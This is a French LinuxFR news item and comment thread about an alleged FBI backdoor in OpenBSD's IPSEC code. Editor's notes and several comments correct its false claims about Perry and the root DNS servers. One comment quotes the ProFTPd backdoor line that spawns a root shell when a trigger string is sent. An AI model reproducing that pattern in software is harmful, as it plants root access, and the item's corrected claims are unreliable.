Rappelons qu'à l'époque ce système d'exploitation était celui des 13 serveurs DNS racine. En raison de l'expiration du délai de la clause de confidentialité signée avec le FBI, c'est Gregory Perry, un ancien contributeur du projet de cryptographie d'OpenBSD qui nous révèle ça.
Le but était de surveiller la circulation de données chiffrées, en insérant du code malicieux dans la pile réseau IPSEC d'OpenBSD. Theo de Raadt, le fondateur du projet OpenBSD, incite les utilisateurs de ce système à faire un audit du code concerné.
NdM : À ce jour, il est de rigueur d'être prudent : sur la liste de diffusion OpenBSD, Jason L. Wright explique que c'est un problème qui n'est plus d'actualité et relève de la légende urbaine. L'audit de code lancé par les développeurs a permis de trouver au moins deux bugs mais il serait hasardeux de les relier aux allégations de Gregory Perry. Pour plus de détails voir le nouveau mail de Theo de Raadt.
NdM 2 : A la suite des précisions apportées dans les commentaires de cette dépêche il s'avère que Gregory Perry n'a jamais été un contributeur du projet OpenBSD et que cet OS n'était pas installé sur les serveurs DNS racine.
Aller plus loin
- Forum Fedora-Fr : Le FBI aurait intégré des trojans dans OpenBSD (14 clics)
- ZDnet : Le FBI soupconné d'avoir integré des backdoors dans OpenBSD (8 clics)
- Génération NT : OpenBSD : des backdoors du FBI dans le code source ? (7 clics)
- Root DNS (3 clics)
- Le message de Gregory Perry transféré par Theo de Raadt (7 clics)
- Une mise au point par Theo de Raadt (17 clics)
# Information vraie ou fausse ?
Posté par Pierre Jarillon (site web personnel) . Évalué à 7.
Des backdoors, on en a trouvé dans d'autres systèmes d'exploitation. Des autorités gouvernementales ont été suspectées ou incriminées. Le fait que Theo de Raadt ne traite pas cela par le mépris est à prendre en compte.
En fin de compte, c'est à chacun de se faire une opinion.
[^] # Re: Information vraie ou fausse ?
Posté par kowalsky . Évalué à 10.
Il est trop tôt pour se faire une opinion.
Ce qui en ressort, c'est la transparence que le modèle open-source impose. C'est quasi sur que dans un système sans accès au source, ça serait resté en interne, au moins jusqu'à ce que l'on tire les choses au clair.
[^] # Re: Information vraie ou fausse ?
Posté par Pierre Tramo (site web personnel) . Évalué à 1.
En quoi est ce que les modérateurs doivent décider si la news est un troll ou pas avant de la publier? Il aurait fallu attendre la conclusion définitive de l'audit avant de décider si oui ou non la news est un troll?
Est ce que ça n'aurait pas été mieux de publier uniquement les faits publier que de publier un truc avec 2 semaines de retard par rapport au mail orignal? La news parle plus des dns que des faits, rien d'intéressant ou de nouveau... Pourquoi ne pas avoir fait passer le journal ( http://linuxfr.org/~Zezinho/30572.html ) en news?
[^] # Re: Information vraie ou fausse ?
Posté par Maclag . Évalué à 5.
Mais ils auraient très bien pu décider de boucler leur débat interne vendredi matin...
------------->[ ]
[^] # Re: Information vraie ou fausse ?
Posté par Kerro . Évalué à 9.
Juste un mot pour qu'ils ne se pendent pas (je prétends parler au nom de presque tous, n'hésitez pas à compléter/corriger) :
Personne n'est jamais content, mais c'est juste une mode locale. Nous tenons à vous, nous vous aimons beaucoup, vous êtes beaux.
Quelqu'un a une meilleuer formulation ? Ca ne devrait pas être bien compliqué :-)
[^] # Re: Information vraie ou fausse ?
Posté par patrick_g (site web personnel) . Évalué à 8.
Nous avions pourtant tenter de moduler la dépêche en ajoutant une NdM bien claire....mais certains préfèrent gueuler que lire.
[^] # Re: Information vraie ou fausse ?
Posté par Maclag . Évalué à 2.
Moi aussi, je vous aime!
[^] # Re: Information vraie ou fausse ?
Posté par patrick_g (site web personnel) . Évalué à 2.
[^] # Re: Information vraie ou fausse ?
Posté par vosgien_ . Évalué à 0.
Dans le cas présent c'est justement le fait d'avoir lu qui m'a fait gueuler. La NdM initiale ne corrigeant absolument rien aux calomnies que contient cette dépêche.
La deuxième NdM rectifie la news, mais pardonne moi l'expression de saison... cette dépêche est maintenant un vrai sapin de noël.
[^] # Re: Information vraie ou fausse ?
Posté par patrick_g (site web personnel) . Évalué à 4.
Et c'est ça que je te reproche.
Pourquoi ne pas juste poster un commentaire rectificateur pour signaler les erreurs de la dépêche ? Tout le monde est reconnaissant quand quelqu'un apporte une information...mais la forme ça compte !
Est-ce que étais obligé d'employer des expressions comme "Mais qui valide la publication de ces torchons ?" ou du type "Comme à l'accoutumée sur Trollfr, encore un torchon inexact et bourré de raccourcis" ?
L'auteur de la news a fait deux erreurs dans son texte mais pourquoi est-ce que tu choisis d'interpréter ça comme des calomnies (donc ayant une intention malveillante) plutôt que comme de simples erreurs qu'il faut rectifier ?
[^] # Re: Information vraie ou fausse ?
Posté par vosgien_ . Évalué à -9.
Il faudrait savoir... Soit tu me reproches de ne pas lire une news... soit tu me reproches de la lire. Que faire dans ces conditions mon cher patrick_g ?
Je vais me répéter... mais se prétendre un site d'information relativement technique dans le monde des logiciels libres et publier ça... WAW !
Pour être franc, rien que le fait que les modérateurs ne se soient pas urinés dessus en lisant la news m'atterre...
[^] # Re: Information vraie ou fausse ?
Posté par Littleboy . Évalué à 3.
Pourquoi donc? Les moderateurs sont le reflet du lectorat, avec le meme niveau technique en moyenne (en plus d'etres benevoles), donc il n'y a rien d'etonnant. C'est pas la premiere fois qu'ils laissent passer une news toute pourrie et rajoute des Ndm qui finissent par etre plus longs que la news d'origine.
Au final, c'est corrige dans les commentaires (puis dans la news), donc c'est pas bien grave. La majorite des news sont plutot ok, c'est pas une ou deux bizarreries qui vont vraiment changer la face du site.
Et euh sinon, il y a vraiment des gens qui prennent LinuxFR pour un "site d'information relativement technique"?
[^] # Re: Information vraie ou fausse ?
Posté par Maclag . Évalué à 10.
S'ils ne le savent pas par cœur, ils doivent l'étudier, ainsi que chaque élément d'une dépêche point par point.
Encore un peu et on va les excuser de ne pas connaître Wikipedia intégralement, zut à la fin! De qui se moque-t-on??
Plus sérieusement:
Il me semble que Linuxfr accueille à bras ouverts les contributeurs, et après un protocole d'acceptation de nouveaux modos.
vosgiens_: si tu te sens capable d'avoir la même analyse pertinente sur cet article en particulier que sur tous les autres articles publiés ici, et ce rapidement parce que les dépêches ne sont pas censées rester trop longtemps en modération (sinon ça gueule aussi), libre à toi de te proposer!
On verra si après avoir compris l'amplitude de la tâche tu seras toujours aussi vindicatif...
En attendant, ce site est modéré par des êtres humains avec leurs limites et leurs contraintes en termes de temps. Et finalement je trouve que c'est très bien comme ça.
Oh ciel! Linuxfr n'est pas parfait! Et ben non, il y a des erreurs dans cette dépêche, peut-être grosse de TON point de vue. Je peux prédire dès maintenant et sans risque qu'il y en aura d'autres, énormes pour quelqu'un qui maitrise le sujet et moins pour les autres...
Tu peux relever des erreurs, mais par respect pour les gens qui consacrent un temps fou pour faire de ce site ce qu'il est, avec un peu de retenue et d'humilité, merci pour eux!
[^] # Re: Information vraie ou fausse ?
Posté par beagf (site web personnel) . Évalué à 7.
Ce que je trouve particulièrement dommage c'est qu'il y a des informations fausses dans la dépêche et qu'elles n'ont toujours pas été corrigées malgré le passage de modérateurs dans le coin.
Quand un commentaire signale des fautes d'orthographe, elles sont corrigées en 3 minutes. Ici il y a notamment le fait que Gregory Perry n'a jamais été un contributeur du projet, qui peut ce vérifier en 30 secondes en lisant le mail de Theo, qui reste en plein milieu de la dépêche et qui discrédite tout le reste.
(Je suis d'accord que vérifier le coup des DNS avant de faire la correction peut prendre un peu plus de temps.)
[^] # Re: Information vraie ou fausse ?
Posté par patrick_g (site web personnel) . Évalué à 8.
Il y a l'école de ceux qui ne prennent pas de gants et qui changent les phrases de l'auteur.
Il y a l'école de ceux qui ajoutent une NdM correctrice mais qui laissent la news telle quelle.
Il y a l'école de ceux qui qui laissent la news telle quelle et n'ajoutent pas de NdM parce qu'ils pensent qu'avoir des commentaires qui corrigent les infos de la dépêche est suffisant.
Comme je suis un centriste invétéré j'opte pour le choix médian et je vais updater la NdM.
[^] # Re: Information vraie ou fausse ?
Posté par beagf (site web personnel) . Évalué à 3.
Pour ce qui est de la manière de modifier la news, tous les avis sont défendables et j'ai toujours du mal avec les extrêmes :
- changer la news sans qu'il n'y ait aucune trace de la modification n'est pas une bonne solution à mon avis et rend caduc certains commentaires, voir fil de discutions complets ;
- ne rien faire n'est pas non plus une bonne solution car tout le monde ne lit pas les commentaires ou, comme cela m'arrive souvent, lisent juste la news sur la page d'accueil sans allez voir plus loin.
Dans tous les cas merci d'avoir ajouté cette deuxième NdM, cela clarifie les choses. Mais histoire de pinailler et de bien montrer que LinuxFR mérite sa réputation de nid à troll, ne serait-il pas encore plus clair de rayer les informations fausses dans la news d'origine ? J'en appel à trolleurs professionnels afin d'avoir leur avis... (le mien étant que c'est déjà très bien comme ça....)
[^] # Re: Information vraie ou fausse ?
Posté par pasBill pasGates . Évalué à 5.
Je proposes marketing@microsoft.com , car ils ne sont ni fanboys-BSD(Theo a jete un Whiskey-Coca sur la tete du directeur car il etait de mauvaise), ni fanboys-Linux(j'ai vraiment besoin de donner une raison la ?), ni fanboys-Debian(pas assez barbus, et ce sont en bonne partie des femmes), ni fanboys-Ubuntu (trop intelligents), ni fanboys-Redhat (les chapeaux rouges son trop voyants)
[^] # Re: Information vraie ou fausse ?
Posté par Krunch (site web personnel) . Évalué à 5.
Tes préjugés sont scandaleux et sans fondement :op http://women.debian.org/
pertinent adj. Approprié : qui se rapporte exactement à ce dont il est question.
[^] # Re: Information vraie ou fausse ?
Posté par gaston . Évalué à 10.
Il aura déja mieux valu chercher à vérifier l'information en elle-même, par exemple en lisant tout le fil de discussion sur tech@.
Comme le dis très bien vosgien_ plus bas, nulle part il n'est fait mention de l'utilisation d'openbsd pour les root dns, ca ajoute juste une touche de sensationalisme, et 'gregory perry' n'a jamais été contributeur ou commiter OpenBSD. Il a certes bossé (avant de s'en faire virer apparamment) pour une boite qui avait contracté avec certains devs (jason, angelos) pour des développements particuliers à reverser dans le tree.
Bref, c'est sur que c'est un beau troll, et du fud certifié pur porc à 90%.
[^] # Re: Information vraie ou fausse ?
Posté par Pierre Jarillon (site web personnel) . Évalué à 5.
Le titre de l'article proposé était au conditionnel. Le fait de l'avoir mis à la forme interrogative permet d'apporter des réponses infirmant ou confirmant ces rumeurs. Les modérateurs ont fait preuve de modération !
Aurait-il mieux valu refuser cet article ? Laisser courir la rumeur ? Le silence n'est pas toujours d'or !
# Et si finalement
Posté par Dabowl_75 . Évalué à -5.
[^] # Re: Et si finalement
Posté par barmic . Évalué à 3.
C'est des patchs fait pour OpenBSD qui auraient ajouter cette faille. Faille qui n'existaient donc pas dans FreeBSD ni même dans BSD4.4.
Tous les contenus que j'écris ici sont sous licence CC0 (j'abandonne autant que possible mes droits d'auteur sur mes écrits)
[^] # Re: Et si finalement
Posté par vosgien_ . Évalué à 1.
D'ailleurs, un certain nombre ont été corrigés dans OpenBSD, mais ne le sont toujours pas chez les autres. Je pense notamment aux drivers pour tirer parti des accélérateurs crypto matériels.
[^] # Re: Et si finalement
Posté par barmic . Évalué à 2.
Tous les contenus que j'écris ici sont sous licence CC0 (j'abandonne autant que possible mes droits d'auteur sur mes écrits)
[^] # Re: Et si finalement
Posté par Dabowl_75 . Évalué à 1.
C'était juste histoire de rappeler que le Hurd est censé avoir remplacé Linux depuis 10 ans.
[^] # Re: Et si finalement
Posté par JGO . Évalué à 3.
Le Hurd n'est plus une priorité.
RMS (extraits): « what I think about the HURD is that finishing it is not crucial. When we started the HURD, no usable free kernel existed. That problem does not exist today. Linux works ok as a kernel. The obstacle [is] rather the use of devices whose specs are secret. That's why our high priority task list* includes items relating to free drivers, but not the HURD. »
http://blog.reddit.com/2010/07/rms-ama.html (question 13)
* http://www.fsf.org/campaigns/priority-projects/
[^] # Re: Et si finalement
Posté par totof2000 . Évalué à 3.
# Mais qui valide la publication de ces torchons ?
Posté par vosgien_ . Évalué à 6.
Rappelons qu'à l'époque ce système d'exploitation était celui des 13 serveurs DNS racine.
Là je me dis... O M G. Mais comment prendre le reste de ce billet au sérieux après ça... A quel endroit as-tu lu une telle débilité ?
En raison de l'expiration du délai de la clause de confidentialité signée avec le FBI, c'est Gregory Perry, un ancien contributeur du projet de cryptographie d'OpenBSD qui nous révèle ça.
Vous avez au moins *lu* les mails de Theo de Raadt ? Ce mec (Gregory Perry) n'a jamais fait partie du projet, de près ou de loin !
Le but était de surveiller la circulation de données chiffrées, en insérant du code malicieux dans la pile réseau IPSEC d'OpenBSD.
Le but *aurait* été. Il n'existe aujourd'hui aucune preuve qu'il y ait eu volontairement la moindre vulnérabilité.
Et puis on parle d'OpenBSD... Tu t'es au moins un minimum renseigné où était également utilisé ce code ? TOUS les autres BSD utilisent le framework crypto d'OpenBSD ainsi que de très nombreux produits commerciaux. D'ailleurs depuis près d'une semaine, des problèmes (trouvés après l'audit, sans lien apparent avec le FBI) ont été corrigés dans OpenBSD mais ne le sont toujours pas chez les autres BSD.
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par Besson Lionel . Évalué à 7.
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par Sébastien B. . Évalué à 6.
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par monde_de_merde . Évalué à 6.
Ça verse un peu dans le sensationnalisme avec cette histoire de chinois du FBI. Et c'est déplaisant.
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par j_kerviel . Évalué à 6.
On trouvera toujours quelque chose à redire quelque part. Dans ce cas, rien n'interdit de faire part de son mécontentement, et, le cas échéant de débattre.
Si on devait insulter toutes les personnes avec lesquelles on n'est pas d'accord, ce serait un gros bordel.
C'est aussi pour ça que depuis quelque millions d'années on a un néocortex qui est sensé s'occuper de ce genre de choses, par opposition au cerveau reptilien qui, lui, ne gère que la survie (en omettant le fait que la théorie du cerveau triunique c'est un tas de foutaises).
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par Frank-N-Furter . Évalué à 1.
Enfin, je parle, mais je ne suis pas mieux.
Depending on the time of day, the French go either way.
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par campagnard . Évalué à -2.
Meme s'il a raison sur le fond, l'aggressivité et le manque de respect dont il fait preuve me poussent à le moinser. Meme si, j'en conviens, son commentaire est "pertinent" sur le fond, la forme est tellement gerbante que finalement, je trouve que ce commentaire n'a pas sa place ici.
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par vosgien_ . Évalué à 2.
Je pense surtout qu'un site comme celui-ci, qui est considéré par du monde comme une référence et qui propose dans une dépêche de telles calomnies sur un projet, c'est ça, le manque de respect !
Que les modérateurs n'aient pas l'obligeance de passer deux minutes avant de vérifier ce qui peut se lire instantanément dans les sources... surtout pour une news aussi polémique sur des sujets aussi sensibles... c'est ça, le manque de respect !
Ici le manque de respect, il vient de ce site... envers les lecteurs, et le projet en question.
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par Le Pnume . Évalué à 8.
"Une news aussi polémique" : j'aimerais savoir en quoi cette news est polémique ?.(je parle de la news pas des commentaires)
En ce qui concerne la modération, les modo ont fait leur boulot, ils ont estimé que la news était publiable, ils l'ont donc publié. La question est : Selon toi combien de temps doit passer chaque modérateur à vérifier une news ? Parce que s'ils mettent trop de temps les posteurs râlent que leur news n'est pas publiée et les moules râlent parce qu'il n'y a rien de neuf sur la bouchot.
Des news avec des erreurs, il y en a déjà eu et il y en aura encore et si erreur il y a, les commentaires la corrige. Et si une fois de temps en temps, une erreur passe et n'est pas corrigé c'est que le sujet devait pas intéresser grand monde.
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par vosgien_ . Évalué à 2.
Tu as lu les *faits* ? Il n'y a absolument AUCUNE preuve de quoi que ce soit.
introduit une backdoor dans OpenBSB comme "sujet aussi sensible" on fait mieux.
Le problème (et si tu avais lu les liens donnés dans la news tu l'aurais su) c'est que si la rumeur était vraie, elle ne concernerait pas seulement OpenBSD mais *tous* les systèmes BSD et des dizaines d'équipementiers de produits de réseau, de sécurité, etc.
Donc oui, je ne sais pas ce qu'il te faut de plus... mais c'est sensible.
"Une news aussi polémique" : j'aimerais savoir en quoi cette news est polémique ?
Je t'invite à lire le tout premier commentaire.
En ce qui concerne la modération, les modo ont fait leur boulot, ils ont estimé que la news était publiable, ils l'ont donc publié.
C'est là le problème. Ce site se dit un minimum technique. Et concentrer dans une seule dépêche autant d'inexactitudes et de raccourcis, c'est surréaliste. Même les sites généralistes ont été plus factuels.
D'ailleurs au passage, vu le nombre de sites généralistes ayant relayé cette information, encore une preuve (s'il était besoin d'en faire) que le sujet est sensible.
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par El Titi . Évalué à 5.
Ah ben non en fait, ils ne sont coupables que d'ignorance et de ne pas avoir épluché tous les forums pendants des heures gratos pour que môssieur soit satisfait.
Et ca vient parler de respect.
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par vosgien_ . Évalué à -1.
Ouhla, de mieux en mieux. L'ignorance est une excuse pour raconter n'importe quoi dans une news.
et de ne pas avoir épluché tous les forums pendants des heures gratos pour que môssieur soit satisfait.
Si pour toi c'est trop demander que la personne qui propose une news lise à minima les références qu'elle fourni... Je pense effectivement pouvoir venir t'expliquer ce qu'est le respect.
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par El Titi . Évalué à 5.
Ouhla, de mieux en mieux. L'ignorance est une excuse pour raconter n'importe quoi dans une news.
Parce que toi tu ne te trompes jamais ?
Si pour toi c'est trop demander que la personne qui propose une news lise à minima les références qu'elle fourni... Je pense effectivement pouvoir venir t'expliquer ce qu'est le respect.
Le manque de respect que tu manifestes est envers les modérateurs pas de l'auteur.
Et effectivement, je considère qu'il ne sont pas forcément experts dans tous les sujets qu'ils laissent passer.
Maintenant, si ce site n'est pas à la hauteur de tes espérances en terme de qualité, je suis navré de te dire que tu t'es gourré d'endroit.
C'est un site communautaire pas une autorité officielle ou un consortium de standardisation.
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par barmic . Évalué à 3.
Non c'est pas ce qu'il a dit. Lit avant de répondre. Il a dit que ce n'est pas de la calomnie mais de l'ignorance.
Tous les contenus que j'écris ici sont sous licence CC0 (j'abandonne autant que possible mes droits d'auteur sur mes écrits)
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par vosgien_ . Évalué à -3.
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par El Titi . Évalué à 0.
Une de tes rares interventions
J'étais certain qu'un tel article (très bien écrit et objectif de surcroit) sur linuxfr déclencherait des commentaires de fanatiques comme celui-ci ou les habituelles baves de patrick_g (qui n'a d'ailleurs pas manqué à l'appel ;) ).
http://www.linuxfr.org/comments/980743,1.html
T'as un souci avec patrick_g ?
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par vosgien_ . Évalué à -4.
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par El Titi . Évalué à 1.
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par vosgien_ . Évalué à 0.
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par tuXico . Évalué à -1.
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par tuXico . Évalué à -2.
T'as un souci avec patrick_g ?
:-DDD
Tu n'as pas pris un argument qui sert ce que tu penses. C'est joli : tu vas t'auto forcer à plus de mauvaise foi...
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par El Titi . Évalué à 5.
Que les modérateurs n'aient pas l'obligeance de passer deux minutes avant de vérifier ce qui peut se lire instantanément dans les sources... surtout pour une news aussi polémique sur des sujets aussi sensibles... c'est ça, le manque de respect !
Le manque de respect c'est d'oublier que les modérateurs sont bénévoles et n'ont pas de compte à te rendre.
Le fait qu'il soit la référence, est tout à son honneur mais il n'en demeure pas moins qu'il ne le revendique pas, il l'est devenu par la force des choses et pas grâce à tes contributions
http://www.linuxfr.org/~vosgien_/
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par vosgien_ . Évalué à -1.
Haha je m'y attendais à celle là. Le fameux bénévolat des modérateurs.
Et toi, y penses-tu aux bénévoles d'OpenBSD qui contribuent du temps et de l'argent pour en faire ce qu'il est aujourd'hui ? Tu penses à quel point ce type de news leur manque de respect à ces *bénévoles* ?
Visiblement non.
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par El Titi . Évalué à 4.
En quoi cela leur porte atteinte ?
De Raadt lui-même l'a signalé et c'est tout à son honneur.
Il a plutôt été salué ici pour sa transparence.
Mais même sans ça, ca ne te donne pas plus de légitimité pour être odieux.
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par barmic . Évalué à 7.
Tu as ouvert ton dico aujourd'hui ? C'est bien tu as appris un nouveau mot, mais ce n'est pas pour ça qu'il faut l'utiliser partout tout le temps. Essaie aussi de lire la définition.
Tous les contenus que j'écris ici sont sous licence CC0 (j'abandonne autant que possible mes droits d'auteur sur mes écrits)
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par karteum59 . Évalué à 2.
Tiens, BTW, http://www.trollfr.org/ utilise apparemment OpenBSD :)
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par ecyrbe . Évalué à 4.
Laisser passer un tel torchon en dépêche c'est vraiment moche.
Je pense que les modérateurs devraient prendre le temps de recouper les informations qu'ils valident en dépêche.
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par Axioplase ıɥs∀ (site web personnel) . Évalué à 3.
[^] # Re: Mais qui valide la publication de ces torchons ?
Posté par modr123 . Évalué à 0.
# Une porte dérobéde dans un logiciel libre ?
Posté par Charles Flèche (site web personnel) . Évalué à 3.
[^] # Re: Une porte dérobée dans un logiciel libre ?
Posté par Charles Flèche (site web personnel) . Évalué à -1.
(Sympa le petit strip quand on se répond à soit même !).
[^] # Re: Une porte dérobée dans un logiciel libre ?
Posté par Frédéric Stemmelin . Évalué à 2.
[^] # Re: Une porte dérobéde dans un logiciel libre ?
Posté par JGO . Évalué à 9.
Tu peux aller voir : http://underhanded.xcott.com/
C'est un concours d'écriture de code C organisé par un universitaire anglais, dont le principe est que le code doit implémenter un comportement subtilement malicieux qui a pourtant l'air innocent à première lecture. Points bonus si tu arrives à faire en sorte que ta faille, une fois découverte, puisse être vue comme une malencontreuse erreur de débutant plutôt qu'une faille délibérée.
[^] # Re: Une porte dérobéde dans un logiciel libre ?
Posté par mansuetus (site web personnel) . Évalué à 4.
Le code malicieux était pas mal planqué... il a été découvert mais a touché pas mal de monde...
http://forums.unrealircd.com/viewtopic.php?t=6562
Alors effectivement, c'est un peu moins surveillé que d'autres projets... but still !
[^] # Re: Une portedérobédedans un logiciel libre ?
Posté par moules . Évalué à 2.
sur le serveur qui a été remplacée.
En outre, le diff est quand même très explicite sur la nature du changement et
de la backdoor introduite, ce ne serait donc pas passé dans un cas similaire à
celui d'OpenBSD.
[^] # Re: Une portedérobédedans un logiciel libre ?
Posté par Victor STINNER (site web personnel) . Évalué à 5.
http://fr.wikipedia.org/wiki/Porte_d%C3%A9rob%C3%A9e#ProFTPd(...)
Une personne possédant les archives verrolées et non verrolées peut se rendre compte de la modification en cherchant les différences :
+ if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
[^] # Re: Une portedérobédedans un logiciel libre ?
Posté par guppy . Évalué à 5.
[^] # Re: Une portedérobédedans un logiciel libre ?
Posté par Victor STINNER (site web personnel) . Évalué à 2.
[^] # Re: Une porte dérobéde dans un logiciel libre ?
Posté par FReEDoM (site web personnel) . Évalué à 3.
En effet, introduire une backdoor (porte dérobée) brute du type "j'envois la clé crypto à telle adresse" serait détectée dès le commit.
Ce qui aurait été introduit serait plus de l'ordre d'une erreur de code pour rendre l'algorithme de chiffrement plus faible et donc plus facilement cassable ; comme par exemple un tampon pas initialisé totalement de manière aléatoire.
[^] # Re: Une porte dérobéde dans un logiciel libre ?
Posté par Jux (site web personnel) . Évalué à 7.
Il s'agit d'une porte dérobée qui *permettrait* à un attaquant sachant qu'elle existe de casser un algorithme de crypto.
Le meilleur exemple, c'est le coup de Debian avec OpenSSL. Un mainteneur debian a enlevé une ligne de code qui initialisait le générateur aléatoire d'OpenSSL. Du coup, ce dernier avait seulement 98301 valeurs d'initialisation possibles. Et même si ça semble beaucoup, ça permet à un attaquant de retrouver la clé privée associée à une clé publique.
Bref, la crypto c'est vraiment un domaine ultra sensible où une simple addition ou une valeur qui traîne dans un buffer peut complètement casser un algorithme. Certains s'amusent même à mesurer le temps que prends le processeur pour vérifier un mot de passe ou calculer un hash afin d'en tirer de l'information[2].
Donc c'est vraiment loin d'être facile de s'assurer qu'un logiciel - même libre - n'est pas sujet à ce genre de chose. D'ailleurs en général, le code des fonctions de crypto est très très peu digeste, donc on a vite fait d'y cacher une petite erreur.
Et puis bon, être capable de s'assurer qu'une fonction de crypto fonctionne correctement, ça demande un sacré niveau en maths ET en informatique, donc le nombre de potentiels relecteurs est pas si grand que ça. D'ailleurs sur la discussion sur la liste OpenBDS, il est à plusieurs reprise mentionné que ça serait bien si un "vrai" cryptographe pouvait jeter un oeil.
[1] http://wiki.debian.org/SSLkeys#Howweak.3F
[2] http://fr.wikipedia.org/wiki/Attaque_temporelle
[^] # Re: Une porte dérobéde dans un logiciel libre ?
Posté par Victor STINNER (site web personnel) . Évalué à 3.
Après il existe aussi les portes dérobées involontaires, comme la fameuse histoire de Debian+OpenSSL, ou encore l'installeur Ubuntu qui stockait le mot de passe root en clair sans un fichier lisible par n'importe qui.
J'ai complété l'article Wikipédia en documentant 7 affaires de portes dérobées :
http://fr.wikipedia.org/wiki/Porte_d%C3%A9rob%C3%A9e
[^] # Re: Une porte dérobéde dans un logiciel libre ?
Posté par Régis . Évalué à 2.
Moi je pense que pour la faille de Debian, c'est un coup des Chinois du DCRI.
Décidément ces Chinois sont partout. Le grand péril jaune pèserait'-il sur l'open source ?
[^] # Re: Une porte dérobéde dans un logiciel libre ?
Posté par EdB . Évalué à 2.
[^] # Re: Une porte dérobéde dans un logiciel libre ?
Posté par Victor STINNER (site web personnel) . Évalué à 3.
[^] # Re: Une porte dérobéde dans un logiciel libre ?
Posté par claudex . Évalué à 6.
« Rappelez-vous toujours que si la Gestapo avait les moyens de vous faire parler, les politiciens ont, eux, les moyens de vous faire taire. » Coluche
# Ouf ?
Posté par amielp . Évalué à -4.
Heureusement que Linux n'a pas de code originaire d'une agence américaine ... à part SELinux
Moi je dis si cette histoire est vraie, le code compromis c'est OpenBSD pas sure. Linux certainement.
# Les serveurs racine du DNS sont multiples
Posté par Stéphane Bortzmeyer (site web personnel, Mastodon) . Évalué à 7.
Donc, les treize serveurs utilisent des systèmes d'exploitation différents et des serveurs DNS différents. Heureusement, pour la fiabilité de l'Internet. Sinon, une seule bogue dans un logiciel particulier pourrait les faire tomber en même temps !
Suivre le flux des commentaires
Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.